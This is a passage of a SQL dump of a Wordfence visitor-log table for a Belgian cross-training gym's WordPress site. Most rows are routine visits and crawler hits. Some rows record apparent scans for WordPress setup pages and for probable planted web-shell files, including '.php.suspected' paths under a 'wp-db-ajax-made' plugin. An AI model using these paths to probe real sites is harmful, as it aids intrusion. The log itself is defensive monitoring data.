(76016, 1498295398.941872, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76017, 1498295407.221433, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76018, 1498295414.797243, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76019, 1498295415.947689, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76020, 1498297317.104747, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/new/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76021, 1498297317.105488, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/blogs/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76022, 1498297317.632070, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/beta/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76023, 1498297317.633179, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/news/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76024, 1498297318.015850, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/blog/wordpress/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76025, 1498306847.776264, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/xml_rpc.class.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/xml_rpc.class.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76026, 1498311277.581544, 2513094943, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/pdo.inc.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/pdo.inc.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76027, 1498314157.628274, 3475901901, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76028, 1498317050.937379, 633042990, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/administrator/', '', ''),
(76029, 1498317051.631488, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', ''),
(76030, 1498317051.954384, 633042990, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', ''),
(76031, 1498317052.563545, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', ''),
(76032, 1498317053.000067, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', ''),
(76033, 1498317053.388446, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', ''),
(76034, 1498317053.801056, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', ''),
(76035, 1498317054.177310, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', ''),
(76036, 1498317054.576406, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', ''),
(76037, 1498317055.058158, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/hello-world/', '', ''),
(76038, 1498317055.493179, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', ''),
(76039, 1498317055.824437, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', ''),
(76040, 1498317056.197791, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', ''),
(76041, 1498317056.502234, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', ''),
(76042, 1498317056.808468, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/feed/', '', ''),
(76043, 1498317057.115019, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', ''),
(76044, 1498317057.416186, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', '', ''),
(76045, 1498317057.720573, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', ''),
(76046, 1498317058.026084, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/author/admin/', '', ''),
(76047, 1498317058.365069, 633042990, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/hello-world/#respond', '', ''),
(76048, 1498317058.664831, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/category/uncategorized/feed/', '', ''),
(76049, 1498320952.003502, 1475494060, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/paypal-donation-button.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/paypal-donation-button.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76050, 1498323123.262608, 774130777, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/maill.php', 'http://crosstrainingcenter.be/maill.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76051, 1498324473.620374, 2917938538, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/edqvbo.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/edqvbo.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76052, 1498328930.900642, 2954838202, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76053, 1498329006.104936, 3275627538, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/maint/popup-pomo.php', 'http://crosstrainingcenter.be/maint/popup-pomo.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76054, 1498329043.358718, 3275627538, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/maint/popup-pomo.php', 'http://crosstrainingcenter.be/maint/popup-pomo.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76055, 1498329670.172736, 1475494071, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/look.php.suspected', 'http://crosstrainingcenter.be/look.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76056, 1498331664.458766, 520974918, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76057, 1498331664.448744, 520974922, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76058, 1498331664.462551, 520974913, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76059, 1498331664.464388, 520974922, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76060, 1498331674.050280, 1121751542, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&h=ATOdZQmnJ6AkMlTGKU4akywYv-HpD7Kx_kkZySna8ESN7t6nK4Zs7nD6CcxAi5we67MA-oQpPrw9Pv13vCAoT34CNDUolaPm0FuNWz4vr1M', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36'),
(76061, 1498331691.021619, 1121751542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36'),
(76062, 1498332207.866596, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76063, 1498332716.039177, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76064, 1498333214.002352, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76065, 1498333698.428208, 758636621, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)'),
(76066, 1498333715.026423, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76067, 1498334200.918040, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76068, 1498334670.573112, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76069, 1498335163.284840, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76070, 1498335645.849147, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76071, 1498336104.718198, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76072, 1498336578.857309, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76073, 1498337051.871537, 1123631300, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76074, 1498337284.026178, 1123631300, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(76075, 1498337527.029100, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76076, 1498337983.563622, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76077, 1498338015.192930, 3104081691, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/viewport-compatible.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/viewport-compatible.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76078, 1498338143.948189, 1123631300, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(76079, 1498338457.254362, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76080, 1498338822.832639, 632837775, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76081, 1498338823.603158, 632837775, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76082, 1498338824.199501, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76083, 1498338824.669252, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76084, 1498338825.129597, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76085, 1498338825.804344, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76086, 1498338826.610757, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76087, 1498338827.113264, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76088, 1498338827.617272, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76089, 1498338828.050573, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76090, 1498338828.478529, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76091, 1498338928.876753, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76092, 1498338928.876754, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76093, 1498339370.214025, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76094, 1498339832.498876, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76095, 1498340283.093724, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76096, 1498342363.434258, 1753276934, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-form-ajax.php.suspected', 'http://crosstrainingcenter.be/wp-form-ajax.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76097, 1498348039.925921, 1541139809, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.02.49 (KHTML, like Gecko) Chrome/57.4.9071.4708 Safari/533.32'),
(76098, 1498348047.881172, 1541139809, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.02.49 (KHTML, like Gecko) Chrome/57.4.9071.4708 Safari/533.32'),
(76099, 1498358225.110233, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76100, 1498365325.772971, 1311686202, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76101, 1498365559.977278, 1123631300, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(76102, 1498371548.148877, 1538512053, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(76103, 1498371550.072558, 1538512053, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(76104, 1498371703.917982, 3024883475, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(76105, 1498371704.444517, 3024883483, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(76106, 1498373703.674665, 3024883618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76107, 1498375362.982192, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(76108, 1498375363.800755, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76109, 1498375364.222519, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76110, 1498375364.671332, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76111, 1498375365.241133, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76112, 1498375365.672449, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76113, 1498375366.111291, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76114, 1498375366.994780, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76115, 1498375367.524259, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76116, 1498375368.131610, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76117, 1498375368.645680, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76118, 1498375369.286437, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76119, 1498375369.764507, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76120, 1498375370.198607, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76121, 1498376142.946227, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(76122, 1498376143.476184, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76123, 1498376143.934753, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76124, 1498376144.458899, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76125, 1498376145.015531, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76126, 1498376145.491740, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76127, 1498376145.983630, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76128, 1498376146.492050, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76129, 1498376147.014736, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76130, 1498376147.469955, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76131, 1498376147.913556, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76132, 1498376148.486649, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76133, 1498376148.941239, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76134, 1498376149.380231, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76135, 1498379575.381642, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76136, 1498383846.311388, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76137, 1498383847.504639, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76138, 1498390291.830813, 1538615370, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'android-app://com.google.android.googlequicksearchbox/https/www.google.com', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76139, 1498390293.839583, 1538615370, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76140, 1498391195.915717, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76141, 1498391788.980218, 1571470175, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_model.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_model.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
